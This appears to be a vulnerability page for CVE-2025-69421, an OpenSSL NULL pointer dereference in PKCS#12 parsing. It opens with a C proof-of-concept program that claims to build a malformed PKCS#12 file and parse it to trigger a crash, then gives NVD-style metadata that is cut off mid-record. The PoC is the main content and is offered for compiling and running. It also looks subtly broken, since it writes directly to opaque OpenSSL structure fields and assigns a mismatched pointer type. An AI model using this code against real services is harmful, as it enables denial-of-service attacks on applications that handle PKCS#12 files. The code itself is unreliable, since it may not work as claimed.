CVE-2025-69421

/* * CVE-2025-69421 PoC - Malformed PKCS#12 NULL Pointer Dereference * This PoC creates a malformed PKCS#12 file that triggers NULL pointer dereference * in PKCS12_item_decrypt_d2i_ex() function. * * Compile: gcc -o cve_2025_69421_poc cve_2025_69421_poc.c -lssl -lcrypto * Usage: ./cve_2025_69421_poc <output_p12_file> */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <openssl/err.h> #include <openssl/pem.h> #include <openssl/pkcs12.h> int create_malformed_pkcs12(const char *filename) { /* * Create a minimal malformed PKCS#12 structure * The key is to craft a PKCS#12 with missing or malformed * encrypted data that will cause oct parameter to be NULL */ PKCS12 *p12 = PKCS12_new(); if (!p12) return -1; /* Set version to trigger parsing path */ ASN1_INTEGER_set(p12->version, 3); /* Create empty or minimal safe bags */ STACK_OF(PKCS12_SAFEBAG) *bags = sk_PKCS12_SAFEBAG_new_null(); if (bags) { /* Add a malformed SAFEBAG that will cause issues */ PKCS12_SAFEBAG *bag = PKCS12_SAFEBAG_new(); if (bag) { /* Set a corrupted or missing encrypted content */ /* This will lead to NULL oct parameter in PKCS12_item_decrypt_d2i_ex */ PKCS12_MAC_DATA *mac = PKCS12_MAC_DATA_new(); if (mac) { /* Leave mac data incomplete to trigger the vulnerable code path */ p12->mac = mac; } sk_PKCS12_SAFEBAG_push(bags, bag); } p12->authsafes = sk_PKCS12_SAFEBAG_value(bags, 0); } /* Write the malformed PKCS#12 */ FILE *fp = fopen(filename, "wb"); if (fp) { i2d_PKCS12_fp(fp, p12); fclose(fp); } PKCS12_free(p12); return 0; } int trigger_vulnerability(const char *filename) { /* * Attempt to parse the malformed PKCS#12 file * This will trigger the NULL pointer dereference */ FILE *fp = fopen(filename, "rb"); if (!fp) { printf("[-] Cannot open file: %s\n", filename); return -1; } PKCS12 *p12 = d2i_PKCS12_fp(fp, NULL); fclose(fp); if (p12) { EVP_PKEY *pkey = NULL; X509 *cert = NULL; STACK_OF(X509) *ca = NULL; /* This call triggers PKCS12_parse -> PKCS12_unpack_p7encdata */ int ret = PKCS12_parse(p12, "", &pkey, &cert, &ca); printf("[*] PKCS12_parse returned: %d\n", ret); if (pkey) EVP_PKEY_free(pkey); if (cert) X509_free(cert); if (ca) sk_X509_pop_free(ca, X509_free); PKCS12_free(p12); } else { printf("[-] Failed to parse PKCS#12 (expected with malformed file)\n"); ERR_print_errors_fp(stderr); } return 0; } int main(int argc, char *argv[]) { if (argc < 2) { printf("Usage: %s <output_p12_file>\n", argv[0]); return 1; } printf("[*] Creating malformed PKCS#12 file...\n"); if (create_malformed_pkcs12(argv[1]) == 0) { printf("[+] Malformed PKCS#12 created: %s\n", argv[1]); printf("[*] Attempting to parse (this may trigger crash)...\n"); trigger_vulnerability(argv[1]); } return 0; }

{"cve": {"id": "CVE-2025-69421", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:34.437", "lastModified": "2026-05-12T13:17:26.710", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Issue summary: Processing a malformed PKCS#12 file can trigger a NULL pointer\ndereference in the PKCS12_item_decrypt_d2i_ex() function.\n\nImpact summary: A NULL pointer dereference can trigger a crash which leads to\nDenial of Service for an application processing PKCS#12 files.\n\nThe PKCS12_item_decrypt_d2i_ex() function does not check whether the oct\nparameter is NULL before dereferencing it. When called from\nPKCS12_unpack_p7encdata() with a malformed PKCS#12 file, this parameter can\nbe NULL, causing a crash. The vulnerability is limited to Denial of Service\nand cannot be escalated to achieve code execution or memory disclosure.\n\nExploiting this issue requires an attacker to provide a malformed PKCS#12 file\nto an application that processes it. For that reason the issue was assessed as\nLow severity according to our Security Policy.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,\nas the PKCS#12 implementation is outside the OpenSSL FIPS module boundary.\n\nOpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue."}, {"lang": "es", "value": "Resumen del problema: Procesar un archivo PKCS#12 malformado puede desencadenar una desreferencia de puntero NULL en la función PKCS12_item_decrypt_d2i_ex().\n\nResumen del impacto: Una desreferencia de puntero NULL puede desencadenar un fallo que lleva a la denegación de servicio para una aplicación que procesa archivos PKCS#12.\n\nLa función PKCS12_item_decrypt_d2i_ex() no comprueba si el parámetro oct es NULL antes de desreferenciarlo. Cuando se llama desde PKCS12_unpack_p7encdata() con un archivo PKCS#12 malformado, este parámetro puede ser NULL, causando un fallo. La vulnerabilidad está limitada a la denegación de servicio y no puede ser escalada para lograr la ejecución de código o la divulgación de memoria.\n\nExplotar este problema requiere que un atacante proporcione un archivo PKCS#12 malformado a una aplicación que lo procesa. Por esa razón, el problema fue evaluado como de baja severidad según nuestra Política de Seguridad.\n\nLos módulos FIPS en 3.6, 3.5, 3.4, 3.3 y 3.0 no se ven afectados por este problema, ya que la implementación de PKCS#12 está fuera del límite del módulo FIPS de OpenSSL.\n\nOpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 y 1.0.2 son vulnerables a este problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.2", "versionEndExcluding": "1.0.2zn", "matchCriteriaId": "6A8EC60C-05EC-4886-8C82-63AEF4BDA8D5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.1.1", "versionEndIncluding": "1.1.1ze", "matchCriteriaId": "A940A7B2-E35C-420E-A0EE-F1089180C133"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.0.19", "matchCriteriaId": "C76C5F55-5243-4461-82F5-2FEBFF4D59FA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.3.0", "versionEndExcluding": "3.3.6", "matchCriteriaId": "F5292E9E-6B50-409F-9219-7B0A04047AD8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.4.0", "versionEndExcluding": "3.4.4", "matchCriteriaId": "B9D3DCAE-317D-4DFB-93F0-7A235A229619"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.0", "versionEndExcluding": "3.5.5", "matchCriteriaId": "1CAC7CBE-EC03-4089-938A-0CEEB2E09B62"}, {"v ... (truncated)